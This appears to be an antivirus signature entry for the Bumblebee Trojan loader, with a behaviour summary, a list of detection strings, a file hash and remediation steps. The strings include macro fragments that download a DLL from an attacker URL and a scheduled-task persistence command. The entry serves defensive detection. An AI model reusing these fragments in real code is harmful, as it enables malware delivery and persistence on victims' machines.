Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Bumblebee
Trojan:Win32/Bumblebee!rfn is a critical malware loader that establishes persistence by creating scheduled tasks to run every few minutes and attempts to download and execute additional malicious payloads (e.g., DLLs) from suspicious URLs. It often initiates via malicious document macros and utilizes `wscript` and potentially process hooking for execution and evasion.
Relevant strings associated with this threat:
- pvunjSjVYP (PEHSTR_EXT)
- chtasks.exe /F /create /sc minute /mo 4 /TN " (PEHSTR_EXT)
- /ST 04:00 /TR "wscript /nologo (PEHSTR_EXT)
- \\.\pipe\boost_process_auto_pipe (PEHSTR_EXT)
- .SpecialFolders("MyDocuments") & "\name.dll" (MACROHSTR_EXT)
- .Open "GET", "https://irs.reviews/KFOJRIOHNV(R)(A#IFK)_FIO#)_FK_D/0411r_cr4.dll", bGetAsAsync, "userid", "pass" (MACROHSTR_EXT)
- objshell"b10=b10&".run""" (MACROHSTR_EXT)
- =createobject("wscript.shell").expandenvironmentstrings("%temp%")tempfilename (MACROHSTR_EXT)
- .customdocumentproperties("specialprops3").valuets.writelineb4ts.writelineb10&b1&""""""&b2&""""""",0,-1" (MACROHSTR_EXT)
- subdocument_close()module1.checkerendsub (MACROHSTR_EXT)
- um7o\URo (SNID)
- B#JJs (SNID)
- I_I^I]I\I[IZIYIXH_H^H]H[HZHYHXHPHQHRHSHUHVHWIPIQIRISITIUIVIW (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)12a6ed8bc832cd5aca2135bdfdd7af1064370b5c121e14342b42025df706b9f1Immediately isolate the infected system to prevent further spread. Ensure Windows Defender has fully remediated the detected threat and perform a full system scan with updated antivirus. Manually remove any suspicious scheduled tasks created by the malware and block all associated malicious URLs (e.g., 'irs.reviews') at the network perimeter. Consider a forensic investigation and restoration from a clean backup due to the loader's nature.